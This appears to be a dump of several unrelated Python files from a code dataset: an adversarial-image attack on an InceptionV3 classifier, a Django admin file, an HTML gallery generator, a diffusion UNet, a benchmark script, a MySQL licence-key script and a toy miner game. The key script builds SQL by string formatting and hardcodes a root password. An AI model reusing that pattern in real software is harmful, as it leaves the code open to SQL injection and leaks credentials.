tf.nn.softmax(logits) # probabilities\n return logits, probs, end_point\n\n\ndef grad_cam(end_point, pre_calss_one_hot):\n conv_layer = end_point[_POOL_NAME]\n signal = tf.multiply(end_point[_MODEL_END][:, 1:], pre_calss_one_hot)\n loss = tf.reduce_mean(signal, 1)\n grads = tf.gradients(loss, conv_layer)[0]\n norm_grads = tf.div(grads, tf.sqrt(tf.reduce_mean(tf.square(grads))) + tf.constant(1e-5))\n weights = tf.reduce_mean(norm_grads, axis=(1, 2))\n weights = tf.expand_dims(weights, 1)\n weights = tf.expand_dims(weights, 1)\n weights = tf.tile(weights, [1, _POOL_SIZE, _POOL_SIZE, 1])\n pre_cam = tf.multiply(weights, conv_layer)\n cam = tf.reduce_sum(pre_cam, 3)\n cam = tf.expand_dims(cam, 3)\n cam = tf.nn.relu(cam)\n resize_cam = tf.image.resize_images(cam, [299, 299])\n resize_cam = resize_cam / tf.reduce_max(resize_cam)\n return resize_cam\n\n\ndef cal_IOU(rar_map, adv_map):\n clip_rar = tf.sign(tf.nn.relu(rar_map - tf.reduce_max(rar_map) * 0.5))\n clip_adv = tf.sign(tf.nn.relu(adv_map - tf.reduce_max(rar_map) * 0.5))\n\n tt_tmp = clip_rar + clip_adv\n total_clip = tf.sign(tt_tmp)\n\n b_tmp = tf.nn.relu(clip_rar + clip_adv - 1)\n bing_clip = tf.sign(b_tmp)\n\n iou = tf.reduce_sum(bing_clip, [1, 2, 3]) / tf.reduce_sum(total_clip, [1, 2, 3])\n return iou\n\n\ndef g_loss(rar_map, adv_map):\n grad_cam_loss = tf.reduce_sum(tf.pow(rar_map - adv_map, 2))\n return grad_cam_loss\n\n\ndef sign_gloss(rar_map, adv_map):\n clip_rar = tf.sign(tf.nn.relu(rar_map - tf.reduce_max(rar_map) * 0.2))\n clip_rar = tf.reshape(clip_rar, [-1, 299 * 299])\n flatten_rar_amp = tf.reshape(rar_map, [-1, 299 * 299])\n flatten_adv_map = tf.reshape(adv_map, [-1, 299 * 299])\n\n gloss = tf.reduce_mean(tf.abs(clip_rar - flatten_adv_map))\n\n # closs\n ARGMAX = tf.argmax(probs, 1)\n MA = tf.one_hot(ARGMAX, 1000)\n closs = -tf.losses.softmax_cross_entropy(MA, adv_logits)\n return closs\n # return - 10 * gloss\n\n\nlogits, probs, end_point = inception(x, reuse=tf.AUTO_REUSE)\nrar_logits, rar_probs, rar_end_point = inception(x_rar, reuse=tf.AUTO_REUSE)\nadv_logits, adv_probs, adv_end_point = inception(x_adv, reuse=tf.AUTO_REUSE)\n_correct = tf.equal(tf.argmax(rar_probs, 1), (tf.argmax(adv_probs, 1)))\nrestore_vars = [\n var for var in tf.global_variables()\n if var.name.startswith('InceptionV3/')\n]\nsaver = tf.train.Saver(restore_vars)\nsaver.restore(sess, \"../model/inception_v3.ckpt\")\n\nimagenet_json=('../dataset/imagenet.json')\nwith open(imagenet_json) as f:\n imagenet_labels = json.load(f)\n\n\ndef 
classify(img, correct_class=None, target_class=None):\n fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(10, 8))\n fig.sca(ax1)\n p = sess.run(rar_probs, feed_dict={x_rar: img})[0]\n ax1.imshow(img)\n fig.sca(ax1)\n\n topk = list(p.argsort()[-10:][::-1])\n topprobs = p[topk]\n barlist = ax2.bar(range(10), topprobs)\n if target_class in topk:\n barlist[topk.index(target_class)].set_color('r')\n if correct_class in topk:\n barlist[topk.index(correct_class)].set_color('g')\n plt.sca(ax2)\n plt.ylim([0, 1.1])\n plt.xticks(range(10),\n [imagenet_labels[i][:15] for i in topk],\n rotation='vertical')\n fig.subplots_adjust(bottom=0.2)\n plt.show()\n\n\ndef load(img_path):\n img = PIL.Image.open(img_path).convert('RGB')\n big_dim = max(img.width, img.height)\n wide = img.width > img.height\n new_w = 299 if not wide else int(img.width * 299 / img.height)\n new_h = 299 if wide else int(img.height * 299 / img.width)\n img = img.resize((new_w, new_h)).crop((0, 0, 299, 299))\n img = (np.asarray(img) / 255.0).astype(np.float32)\n return img\n\n\nrar_grad_cam = grad_cam(rar_end_point, labels)\nadv_grad_cam = grad_cam(adv_end_point, labels)\n\nget_random = tf.sign(tf.random_normal([299, 299, 3])) * 8 / 255\n\nget_iou_op = cal_IOU(rar_grad_cam, adv_grad_cam)\ngloss = g_loss(rar_grad_cam, adv_grad_cam)\n\nassign_op = tf.assign(x_adv, x)\n\n# 自动更新\nget_sign_gloss = sign_gloss(rar_grad_cam, adv_grad_cam)\ntrain_op = tf.train.GradientDescentOptimizer(1.2).minimize(get_sign_gloss, var_list=[x_adv])\n# 手动更新\ngrad_sgloss = tf.gradients(get_sign_gloss, x_adv)[0]\ng_assign = tf.assign(x_adv, x_adv - tf.sign(grad_sgloss) * step / 255)\n# project\nepsilon = 4 / 255\nbelow = x - epsilon\nabove = x + epsilon\nprojected = tf.clip_by_value(tf.clip_by_value(x_adv, below, above), 0, 1)\nwith tf.control_dependencies([projected]):\n project_step = tf.assign(x_adv, projected)\n\ncorrect = tf.equal(tf.argmax(rar_probs, 1), (tf.argmax(adv_probs, 1)))\n_corrects=tf.equal(tf.argmax(rar_probs, 1), y_hat)\nsess.graph.finalize()\n\nimport cv2\n\n\ndef get_hot_map(RGC, rar_img):\n RGC = np.reshape(RGC / np.max(RGC), [299, 299])\n RGC = np.expand_dims(RGC, 2)\n RGC = np.tile(RGC, [1, 1, 3])\n RGC = cv2.applyColorMap(np.uint8(255 * RGC), cv2.COLORMAP_JET)\n RGC = cv2.cvtColor(RGC, cv2.COLOR_BGR2RGB)\n alpha = 0.0072\n rar_img /= rar_img.max()\n rar = alpha * RGC + rar_img\n rar /= rar.max()\n return rar\n\n\n# Begin Run\nimport os\nlabels_file = '../dataset/imagenet_labels.txt'\n\nimgs_path = \"../dataset/img_val/\"\nattack_count = 0\ndefense_count = 0\ncount=0\nif os.path.exists(result_file):\n os.remove(result_file)\nwith open(labels_file, 'r', encoding='utf-8')as f:\n lines = f.readlines()\n for index, line in enumerate(lines):\n imgs = []\n labels = []\n label_letter = line.split(' ')\n ground_truths = []\n label_letter = label_letter[0]\n img_class = index\n dir_name = imgs_path + str(label_letter)\n for root, dirs, files in os.walk(dir_name):\n for file in files:\n img_path = dir_name + '/' + file\n label_path = '../dataset/val/' + str(file)[:-4] + 'xml'\n img=load(img_path)\n sess.run(assign_op, feed_dict={x: [img]})\n rar_img = img\n corrects=sess.run(_corrects, feed_dict={x: [img], x_rar: [rar_img], y_hat: img_class})\n if corrects[0]:\n for i in range(3):\n adv_map = sess.run(adv_grad_cam, feed_dict={y_hat: img_class})\n adv_img = np.reshape(sess.run(x_adv), [299, 299, 3])\n adv_map = get_hot_map(adv_map, adv_img)\n sess.run(train_op, feed_dict={x: [img], x_rar: [rar_img], y_hat: img_class})\n # sess.run(project_step, 
feed_dict={x: [rar_img]})\n result=sess.run(correct, feed_dict={x: [img], x_rar: [rar_img], y_hat: img_class})\n if result[0]:\n defense_count+=1\n else:\n attack_count+=1\n count+=1\n print(attack_count,defense_count,count)\n with open(result_file, 'a') as f_w:\n f_w.write(str(result[0])+\"\\n\")\n else:\n print('failed')\n with open(result_file, 'a') as f_w:\n f_w.write(str(attack_count)+str(defense_count)+str(count))\n","sub_path":"experiment/attack_method/train_FGSM.py","file_name":"train_FGSM.py","file_ext":"py","file_size_in_byte":8206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"640287733","text":"from django.contrib import admin\nfrom .models import ContactRequest, Project\nfrom tinymce.widgets import TinyMCE\nfrom django.db import models\n\n\nclass ProjectAdmin(admin.ModelAdmin):\n\n fieldsets = [\n (\"Name\", {\"fields\": [\"name\", \"longName\"]}),\n (\"Type\", {\"fields\": [\"project_type\"]}),\n (\"Description\", {\"fields\": [\"short_description\", \"short_description2\", \"long_description\"]}),\n (\"URL\", {\"fields\": [\"url\"]}),\n (\"Image\", {\"fields\": [\"project_image\"]})\n ]\n\n formfield_overrides = {\n models.TextField: {'widget': TinyMCE()},\n }\n\n\nadmin.site.register(ContactRequest)\nadmin.site.register(Project, ProjectAdmin)\n","sub_path":"main_pages/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"434777780","text":"#!/usr/bin/env python\n\nimport os\nimport sys\n\nif __name__ == '__main__':\n \n plotsuf = ['gif', 'jpg', 'png']\n\n scriptname=sys.argv[0]\n scriptpath=scriptname.split(\"/mkHTML.py\")[0]\n files = os.listdir(scriptpath)\n cwd = os.getcwd()\n\n ausgabe = '<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\">\\n\\\n <html xmlns=\"http://www.w3.org/1999/xhtml\">\\n\\\n <head>\\n\\\n <style type=\"text/css\">\\n\\\n <!--\\n\\\n body {position: absolute; background: white; margin: 0; padding: 0;}\\n\\\n div#images {width: 130;}\\n\\\n div#images a p img {height: 0; width: 0; border-width: 0;}\\n\\\n div#images a:hover p img {position: fixed; top: 157px; left: 600px; height: 372px; width: 596px;}\\n\\\n -->\\n\\\n </style>\\n\\\n <title>Plots in Directory %s\\n\\\n \\n\\\n \\n\\\n Parent Directory\\n\\\n \\n\\\n
<tr>\\n\\\n <td>\\n\\\n <div id=\"images\">\\n' % cwd\n \n plots = []\n alreadyexists = 0\n \n for file in files:\n if (file.split('.')[-1]) not in plotsuf:\n continue\n else:\n for file2 in plots:\n if (file.split('.')[0] == file2.split('.')[0]):\n alreadyexists = 1\n break\n if (alreadyexists == 0):\n plots.append(file)\n alreadyexists = 0\n\n \n i = 0\n j = 0\n ausgabe2 = \"\"\n ausgabe1 = \"\"\n\n plotsuf2 = plotsuf\n plotsuf2.append('eps')\n plotsuf2.append('tiff')\n \n for plot in plots:\n ausgabe1 += ' <a href=\"%s\" target=\"plot\"><p><img src=\"%s\"></p></a>\\n' % (plot,plot)\n ausgabe2 += '\\n'\n i += 1\n j += 1\n if (i % 2) == 0:\n ausgabe += ausgabe2\n ausgabe += '\\n '\n ausgabe += ausgabe1\n ausgabe += '\\n '\n ausgabe1 = \"\"\n ausgabe2 = \"\"\n if (j % 2) == 1:\n ausgabe += ausgabe2\n ausgabe += '\\n '\n ausgabe += ausgabe1\n ausgabe += '\\n '\n ausgabe1 = \"\"\n ausgabe2 = \"\"\n \n ausgabe += ''\n for suffix in plotsuf2:\n if (plot.split('.')[0]+\".\"+suffix) in files:\n ausgabe2 += ' <a href=\"%s\" target=\"plot\">%s</a>' % (plot.split('.')[0]+\".\"+suffix,suffix)\n ausgabe2 += '\\n\\n \\n'\n# ausgabe += \" \\n\"\n ausgabe += '</div>\\n </td>\\n </tr>\\n </table>\\n </body>\\n</html>\\n'\n \nplotsdir = open(scriptpath+'/overview.html', 'w+')\nplotsdir.write(ausgabe)\nplotsdir.close()\n\nplotsdir = open(scriptpath+'/empty.html', 'w+')\nplotsdir.write('<html>\\n <body>\\n No histogram selected \\n </body>\\n</html>')\nplotsdir.close()\n\nindexausgabe = \"\"\nindexausgabe += '<html>\\n'\nindexausgabe += ' <head>\\n'\nindexausgabe += ' <title>Validation plots</title>\\n'\nindexausgabe += ' </head>\\n'\nindexausgabe += ' <frameset cols=\"30%,70%\">\\n'\nindexausgabe += ' <frame src=\"overview.html\">\\n'\nindexausgabe += ' <frame src=\"empty.html\" name=\"plot\">\\n'\nindexausgabe += ' <noframes>\\n'\nindexausgabe += ' <body>\\n'\nindexausgabe += ' Your browser cannot display frames!\\n'\nindexausgabe += ' </body>\\n'\nindexausgabe += ' </noframes>\\n'\nindexausgabe += ' </frameset>\\n'\nindexausgabe += '</html>\\n'\n\nplotsdir = open(scriptpath+'/index.html', 'w+')\nplotsdir.write(indexausgabe)\nplotsdir.close()\n\nindexausgabe = \"\"\n\n\nanalysisausgabe = \"\"\nanalysisausgabe += '<html>\\n'\nanalysisausgabe += ' <head>\\n'\nanalysisausgabe += ' <title>Process and analysis</title>\\n'\nanalysisausgabe += ' </head>\\n'\nanalysisausgabe += ' <body>\\n'\nanalysisausgabe += '<center><h1>Validation plots</h1></center><br><br>\\n'\nanalysisausgabe += ' For these plots the following setup was used:<br>\\n'\n#analysisausgabe += ' configuration of the process (analysis kind, steering file, etc.)<br>
\\n'\n\n\n\n\nanalysisausgabe += ' \\n'\nanalysisausgabe += '\\n'\n\nplotsdir = open(scriptpath+'/analysis.html', 'w+')\nplotsdir.write(analysisausgabe)\nplotsdir.close()\n\nanalysisausgabe = \"\"\n","sub_path":"LeptonJets/mkHTML.py","file_name":"mkHTML.py","file_ext":"py","file_size_in_byte":4546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"143093020","text":"import math\n\nimport torch\nfrom torch import nn\n\n\n@torch.jit.script\ndef mish(inp):\n return inp.mul(torch.nn.functional.softplus(inp).tanh())\n\n\n@torch.no_grad()\ndef variance_scaling_init_(tensor, scale=1, mode=\"fan_avg\", distribution=\"uniform\"):\n fan_in, fan_out = nn.init._calculate_fan_in_and_fan_out(tensor)\n\n if mode == \"fan_in\":\n scale /= fan_in\n\n elif mode == \"fan_out\":\n scale /= fan_out\n\n else:\n scale /= (fan_in + fan_out) / 2\n\n if distribution == \"normal\":\n std = math.sqrt(scale)\n\n return tensor.normal_(0, std)\n\n else:\n bound = math.sqrt(3 * scale)\n\n return tensor.uniform_(-bound, bound)\n\n\ndef conv2d(in_channel, out_channel, kernel_size, stride=1, padding=0, bias=True, scale=1., mode=\"fan_avg\",\n transpose=False):\n conv_class = getattr(nn, f'Conv{\"Transpose\" if transpose else \"\"}2d')\n conv = conv_class(in_channel, out_channel, kernel_size, stride=stride, padding=padding, bias=bias)\n\n variance_scaling_init_(conv.weight, scale, mode=mode)\n\n if bias:\n nn.init.zeros_(conv.bias)\n\n return conv\n\n\ndef linear(in_channel, out_channel, scale=1, mode=\"fan_avg\"):\n lin = nn.Linear(in_channel, out_channel)\n\n variance_scaling_init_(lin.weight, scale, mode=mode)\n nn.init.zeros_(lin.bias)\n\n return lin\n\n\nclass Mish(torch.jit.ScriptModule):\n def __init__(self):\n super().__init__()\n\n def forward(self, input):\n return mish(input)\n\n\ndef upsample(channel):\n return conv2d(channel, channel, 4, stride=2, padding=1, transpose=True)\n\n\ndef downsample(channel):\n return conv2d(channel, channel, 3, stride=2, padding=1)\n\n\n@torch.jit.script\ndef nothing(inp):\n return inp\n\n\nclass ResBlock(torch.jit.ScriptModule):\n def __init__(self, in_channel, out_channel, time_dim, dropout):\n super().__init__()\n\n self.norm1 = nn.InstanceNorm2d( in_channel)\n self.conv1 = conv2d(in_channel, out_channel, 3, padding=1)\n\n self.time = linear(time_dim, out_channel)\n\n self.norm2 = nn.InstanceNorm2d( out_channel)\n self.dropout = nn.Dropout(dropout)\n self.conv2 = conv2d(out_channel, out_channel, 3, padding=1, scale=1e-10)\n self.skip = conv2d(in_channel, out_channel, 1) if in_channel != out_channel else nothing\n\n def forward(self, input, time):\n batch = input.shape[0]\n\n out = self.conv1(mish(self.norm1(input)))\n\n out = out + self.time(mish(time)).view(batch, -1, 1, 1)\n\n out = self.conv2(mish(self.norm2(out)))\n\n return out + self.skip(input)\n\n\nclass SelfAttention(torch.jit.ScriptModule):\n def __init__(self, in_channel, heads=1):\n super().__init__()\n\n self.norm = nn.InstanceNorm2d( in_channel)\n self.weight = torch.nn.Parameter(torch.randn(2 * (in_channel * heads + heads) + in_channel, in_channel))\n self.gate = torch.nn.Parameter(torch.zeros(1))\n self.heads = heads\n self.in_channel = in_channel\n\n def forward(self, inp):\n batch, channel, height, width = inp.shape\n\n out = self.weight.unsqueeze(0).expand(batch, -1, -1).bmm(self.norm(inp).view(batch, channel, -1))\n lin = out[:, :self.in_channel]\n key = out[:, self.in_channel:self.in_channel * (1 + self.heads)].view(batch, channel, self.heads,\n height * 
width)\n query = out[:, self.in_channel * (1 + self.heads):\n self.in_channel + 2 * self.in_channel * self.heads].view(batch, channel, self.heads,\n height * width)\n key_choice = out[:, self.in_channel + 2 * self.in_channel * self.heads:\n self.in_channel + 2 * self.in_channel * self.heads + self.heads].softmax(1)\n query_choice = out[:, self.in_channel + 2 * self.in_channel * self.heads + self.heads:].softmax(1)\n\n key = key.mul(key_choice.unsqueeze(1)).sum(2)\n query = query.mul(query_choice.unsqueeze(1)).sum(2)\n\n key = key.softmax(2).bmm(query.transpose(1, 2))\n lin = key.bmm(lin)\n lin = lin.view(batch, channel, height, width)\n out = lin * self.gate + inp\n return out\n\n\nclass TimeEmbedding(torch.jit.ScriptModule):\n def __init__(self, dim):\n super().__init__()\n\n self.dim = dim\n\n inv_freq = torch.exp(torch.arange(0, dim, 2, dtype=torch.float32) * (-math.log(10000) / dim))\n\n self.register_buffer(\"inv_freq\", inv_freq)\n\n def forward(self, input):\n sinusoid_in = torch.ger(input.view(-1).float(), self.inv_freq)\n pos_emb = torch.cat([sinusoid_in.sin(), sinusoid_in.cos()], dim=-1)\n pos_emb = pos_emb.view(input.size(0), self.dim)\n\n return pos_emb\n\n\nclass ResBlockWithAttention(torch.jit.ScriptModule):\n def __init__(self, in_channel, out_channel, time_dim, dropout, use_attention=False):\n super().__init__()\n\n self.resblocks = ResBlock(in_channel, out_channel, time_dim, dropout)\n\n self.attention = SelfAttention(out_channel) if use_attention else nothing\n\n def forward(self, input, time):\n out = self.resblocks(input, time)\n out = self.attention(out)\n return out\n\n\ndef spatial_fold(input, fold):\n if fold == 1:\n return input\n\n batch, channel, height, width = input.shape\n h_fold = height // fold\n w_fold = width // fold\n\n return input.view(batch, channel, h_fold, fold, w_fold,\n fold).permute(0, 1, 3, 5, 2, 4).reshape(batch, -1, h_fold, w_fold)\n\n\ndef spatial_unfold(input, unfold):\n if unfold == 1:\n return input\n\n batch, channel, height, width = input.shape\n h_unfold = height * unfold\n w_unfold = width * unfold\n\n return input.view(batch, -1, unfold, unfold, height,\n width).permute(0, 1, 4, 2, 5, 3).reshape(batch, -1, h_unfold, w_unfold)\n\n\nclass UNet(torch.jit.ScriptModule):\n def __init__(\n self,\n in_channel,\n channel,\n channel_multiplier,\n n_res_blocks,\n attn_strides,\n dropout=0,\n fold=1,\n ):\n super().__init__()\n\n self.fold = fold\n\n time_dim = channel * 4\n\n n_block = len(channel_multiplier)\n\n self.time = nn.Sequential(\n TimeEmbedding(channel),\n linear(channel, time_dim),\n Mish(),\n linear(time_dim, time_dim),\n )\n\n down_layers = [conv2d(in_channel * (fold ** 2), channel, 3, padding=1)]\n feat_channels = [channel]\n in_channel = channel\n for i in range(n_block):\n for _ in range(n_res_blocks):\n channel_mult = channel * channel_multiplier[i]\n\n down_layers.append(\n ResBlockWithAttention(\n in_channel,\n channel_mult,\n time_dim,\n dropout,\n use_attention=2 ** i in attn_strides,\n )\n )\n\n feat_channels.append(channel_mult)\n in_channel = channel_mult\n\n if i != n_block - 1:\n down_layers.append(downsample(in_channel))\n feat_channels.append(in_channel)\n\n self.down = nn.ModuleList(down_layers)\n\n self.mid = nn.ModuleList(\n [\n ResBlockWithAttention(\n in_channel,\n in_channel,\n time_dim,\n dropout=dropout,\n use_attention=True,\n ),\n ResBlockWithAttention(\n in_channel, in_channel, time_dim, dropout=dropout\n ),\n ]\n )\n\n up_layers = []\n for i in reversed(range(n_block)):\n for _ in range(n_res_blocks + 
1):\n channel_mult = channel * channel_multiplier[i]\n\n up_layers.append(\n ResBlockWithAttention(\n in_channel + feat_channels.pop(),\n channel_mult,\n time_dim,\n dropout=dropout,\n use_attention=2 ** i in attn_strides,\n )\n )\n\n in_channel = channel_mult\n\n if i != 0:\n up_layers.append(upsample(in_channel))\n\n self.up = nn.ModuleList(up_layers)\n\n self.out_norm = nn.GroupNorm(32, in_channel)\n self.out_conv = conv2d(in_channel, 3 * (fold ** 2), 3, padding=1, scale=1e-10)\n\n def forward(self, input, time):\n time_embed = self.time(time)\n\n feats = []\n\n out = spatial_fold(input, self.fold)\n for layer in self.down:\n if isinstance(layer, ResBlockWithAttention):\n out = layer(out, time_embed)\n\n else:\n out = layer(out)\n\n feats.append(out)\n\n for layer in self.mid:\n out = layer(out, time_embed)\n\n for layer in self.up:\n if isinstance(layer, ResBlockWithAttention):\n out = layer(torch.cat((out, feats.pop()), 1), time_embed)\n\n else:\n out = layer(out)\n\n out = self.out_conv(mish(self.out_norm(out)))\n out = spatial_unfold(out, self.fold)\n\n return out\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":9403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"367133074","text":"import sys\nimport argparse\nimport random\nimport time\nimport numpy as np\n\nimport server.compute.diffexp_cxg as diffexp_cxg\nimport server.compute.diffexp_generic as diffexp_generic\n\nfrom server.common.app_config import AppConfig\nfrom server.data_common.matrix_loader import MatrixDataLoader\nfrom server.data_cxg.cxg_adaptor import CxgAdaptor\n\n\ndef main():\n parser = argparse.ArgumentParser(\"A command to test diffexp\")\n parser.add_argument(\"dataset\", help=\"name of a dataset to load\")\n parser.add_argument(\"-na\", \"--numA\", type=int, required=True, help=\"number of rows in group A\")\n parser.add_argument(\"-nb\", \"--numB\", type=int, required=True, help=\"number of rows in group B\")\n parser.add_argument(\"-t\", \"--trials\", default=1, type=int, help=\"number of trials\")\n parser.add_argument(\n \"-a\", \"--alg\", choices=(\"default\", \"generic\", \"cxg\"), default=\"default\", help=\"algorithm to use\"\n )\n parser.add_argument(\"-s\", \"--show\", default=False, action=\"store_true\", help=\"show the results\")\n parser.add_argument(\n \"-n\", \"--new-selection\", default=False, action=\"store_true\", help=\"change the selection between each trial\"\n )\n parser.add_argument(\"--seed\", default=1, type=int, help=\"set the random seed\")\n\n args = parser.parse_args()\n\n app_config = AppConfig()\n app_config.single_dataset__datapath = args.dataset\n app_config.server__verbose = True\n app_config.complete_config()\n\n loader = MatrixDataLoader(args.dataset)\n adaptor = loader.open(app_config)\n\n if args.show:\n if isinstance(adaptor, CxgAdaptor):\n adaptor.open_array(\"X\").schema.dump()\n\n numA = args.numA\n numB = args.numB\n rows = adaptor.get_shape()[0]\n\n random.seed(args.seed)\n\n if not args.new_selection:\n samples = random.sample(range(rows), numA + numB)\n filterA = samples[:numA]\n filterB = samples[numA:]\n\n for i in range(args.trials):\n if args.new_selection:\n samples = random.sample(range(rows), numA + numB)\n filterA = samples[:numA]\n filterB = samples[numA:]\n\n maskA = np.zeros(rows, dtype=bool)\n maskA[filterA] = True\n maskB = np.zeros(rows, dtype=bool)\n maskB[filterB] = True\n\n t1 = time.time()\n if args.alg == \"default\":\n results = 
adaptor.compute_diffexp_ttest(maskA, maskB)\n        elif args.alg == \"generic\":\n            results = diffexp_generic.diffexp_ttest(adaptor, maskA, maskB)\n        elif args.alg == \"cxg\":\n            if not isinstance(adaptor, CxgAdaptor):\n                print(\"cxg only works with CxgAdaptor\")\n                sys.exit(1)\n            results = diffexp_cxg.diffexp_ttest(adaptor, maskA, maskB)\n\n        t2 = time.time()\n        print(\"TIME=\", t2 - t1)\n\n        if args.show:\n            for res in results:\n                print(res)\n\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"server/test/run_diffexp.py","file_name":"run_diffexp.py","file_ext":"py","file_size_in_byte":2881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} {"seq_id":"407930350","text":"import random\r\nimport string\r\nimport pymysql\r\nfrom warnings import filterwarnings\r\nfilterwarnings(\"error\",category=pymysql.Warning) # raise warnings of category pymysql.Warning as errors\r\ndb=pymysql.connect('localhost','root','Mr.jingcheng','python_db')\r\ncur=db.cursor()\r\nsql = \"\"\"CREATE TABLE IF NOT EXISTS ALL_KEYS (\r\n        V_KEY CHAR(35) PRIMARY KEY,\r\n        AVAIL CHAR(1) \r\n        )\"\"\"\r\n\r\n\r\n\r\ndef insert_to_mysql(key):\r\n    sql = \"INSERT INTO ALL_KEYS(V_KEY,AVAIL) VALUES ('%s', '1')\"%(key)\r\n    try:\r\n        cur.execute(sql)\r\n        db.commit()\r\n    except:\r\n        print('Error: insert failed')\r\n        db.rollback()\r\n\r\ndef genernate_key(number=5, lenth=8, part=4):\r\n    result = []\r\n    char_set = string.ascii_letters + string.digits\r\n    for i in range(0, number):\r\n        key = ''\r\n        for j in range(0, part):\r\n            for k in range(0, lenth):\r\n                key = key + random.choice(char_set)\r\n            key = key + '-'\r\n        key = key[0:-1]\r\n        if key not in result:\r\n            result.append(key)\r\n            print(\"%s %s\" % (str(i + 1), key))\r\n        else:\r\n            i -= 1\r\n    return result\r\n\r\ndef key_read_avail():\r\n    sql = \"SELECT * FROM ALL_KEYS \\\r\n           WHERE AVAIL <> 0\"\r\n    cur.execute(sql)\r\n    rows =cur.fetchall()\r\n    result=[]\r\n    for each in rows:\r\n        result.append(each[0])\r\n    return result\r\n\r\ndef key_read_all():\r\n    sql = \"SELECT * FROM ALL_KEYS\"\r\n    result = []\r\n    try:\r\n        cur.execute(sql)\r\n        rows =cur.fetchall()\r\n        for each in rows:\r\n            result.append(each[0])\r\n    except:\r\n        print('Error: unable to fetch data')\r\n    return result\r\n\r\ndef verify_key(key):\r\n    sql = \"SELECT * FROM ALL_KEYS WHERE V_KEY='%s' AND AVAIL='1'\"%key\r\n    cur.execute(sql)\r\n    res=cur.fetchone()\r\n    if res is not None:\r\n        try:\r\n            cur.execute(\"UPDATE ALL_KEYS SET AVAIL = '0' WHERE V_KEY = '%s'\" % (key))\r\n            db.commit()\r\n            return True\r\n        except:\r\n            print('Error: unable to update')\r\n            db.rollback()\r\n    else:\r\n        return False\r\n\r\n\r\n\r\n# result=genernate_key(200)\r\n# for each in result:\r\n#     insert_to_mysql(each)\r\nprint(verify_key('xGJDKbZw-0hfWuCbj-WyH6tAir-LawiPxvm'))\r\n# result = key_read()\r\n# key = 'yf56g7h8-cot4imw3-9e01gml1-0gy7xkdi'\r\n# print(verify_key(result, key))\r\ndb.close()","sub_path":"0003MySQL.py","file_name":"0003MySQL.py","file_ext":"py","file_size_in_byte":2366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} {"seq_id":"339793618","text":"import time\nimport random\nimport states\nimport items\n\n\nclass BaseGameEntity:\n    id = 0\n\n    def __init__(self):\n        self.id = BaseGameEntity.id\n        BaseGameEntity.id += 1\n\nclass Plant(BaseGameEntity):\n    def __init__(self, location, lifespan):\n        super(Plant, self).__init__()\n        self.location = location\n        self.lifespan = lifespan\n\n    def update(self):\n        self.lifespan -= 1\n        if self.lifespan == 0:\n            self.die()\n\n    def die(self):\n        if plant1 in game_objects:\n            game_objects.remove(plant1)\n        if plant2 in 
game_objects:\n game_objects.remove(plant2)\n if plant3 in game_objects:\n game_objects.remove(plant3)\n if plant4 in game_objects:\n game_objects.remove(plant4)\n\n\nclass PoisonPlant(Plant):\n def __init__(self, location, lifespan, name, condition):\n super(PoisonPlant, self).__init__(location, lifespan)\n self.name = name\n self.condition = condition\n\n def debuff(condition):\n if plant1 in game_objects:\n Miner.thirst + 4\n Miner.fatigue + 4\n\nclass EnergyPlant(Plant):\n def __init__(self, location, lifespan, name, condition):\n super(EnergyPlant, self).__init__(location, lifespan)\n self.name = name\n self.condition = condition\n\n def buff(condition):\n if plant2 in game_objects:\n Miner.fatigue - 3\n\nclass LiquidPlant(Plant):\n def __init__(self, location, lifespan, name, condition):\n super(LiquidPlant, self).__init__(location, lifespan)\n self.name = name\n self.condition = condition\n\n def buff(condition):\n if plant4 in game_objects:\n Miner.thirst - 3\n\nclass UltraPlant(Plant):\n def __init__(self, location, lifespan, name, condition):\n super(UltraPlant, self).__init__(location, lifespan)\n self.name = name\n self.condition = condition\n\n def buff(condition):\n if plant3 in game_objects:\n Miner.thirst - 5\n Miner.fatigue - 5\n\n\nclass Miner(BaseGameEntity):\n \"\"\"The Miner game object\n\n \"\"\"\n\n def __init__(self, name, current_state, location, gold_carried, gold_bank, thirst, fatigue, build, pickax):\n super(Miner, self).__init__()\n self.name = name\n self.current_state = current_state\n self.location = location\n self.gold_carried = gold_carried\n self.gold_bank = gold_bank\n self.thirst = thirst\n self.fatigue = fatigue\n self.max_nuggets = 5\n self.status = 'free'\n self.counter_jail = 0\n self.max_nuggets = 7\n self.pickax = pickax\n if build == \"lanky\":\n self.health = 30\n self.strength = 3 + self.pickax.strength\n if build == \"normal\":\n self.health = 50\n self.strength = 5 + self.pickax.strength\n if build == \"bulky\":\n self.health = 70\n self.strength = 7 + self.pickax.strength\n\n def update(self):\n self.thirst += 1\n self.current_state.execute(self)\n\n def change_state(self, new_state):\n self.current_state.exit(self)\n self.current_state = new_state\n self.current_state.enter(self)\n\n def pockets_full(self):\n if self.gold_carried > self.max_nuggets:\n return True\n else:\n return False\n\n def thirsty(self):\n if self.thirst > 10:\n return True\n else:\n return False\n\n def is_tired(self):\n if self.fatigue > 10:\n return True\n else:\n return False\n\nclass Wife(BaseGameEntity):\n\n def __init__(self, name, wife_state, location, fatigue, dishes_washed, shirts_ironed, cups_made):\n super(Wife, self).__init__()\n self.name=name\n self.wife_state=wife_state\n self.location=location\n self.fatigue=fatigue\n self.dishes_washed=dishes_washed\n self.shirts_ironed=shirts_ironed\n self.cups_made = cups_made\n self.max_cups = 2\n\n def update(self):\n self.fatigue+=1\n self.wife_state.execute(self)\n\n def wife_change_state(self, new_state):\n self.wife_state.exit(self)\n self.wife_state=new_state\n self.wife_state.enter(self)\n\n def tired(self):\n if self.fatigue > 4:\n return True\n else:\n return False\n\n def coffee_made(self):\n if self.cups_made == self.max_cups:\n return True\n else:\n return False\n\nif __name__ == '__main__':\n real_miner = Miner('Bob',\n 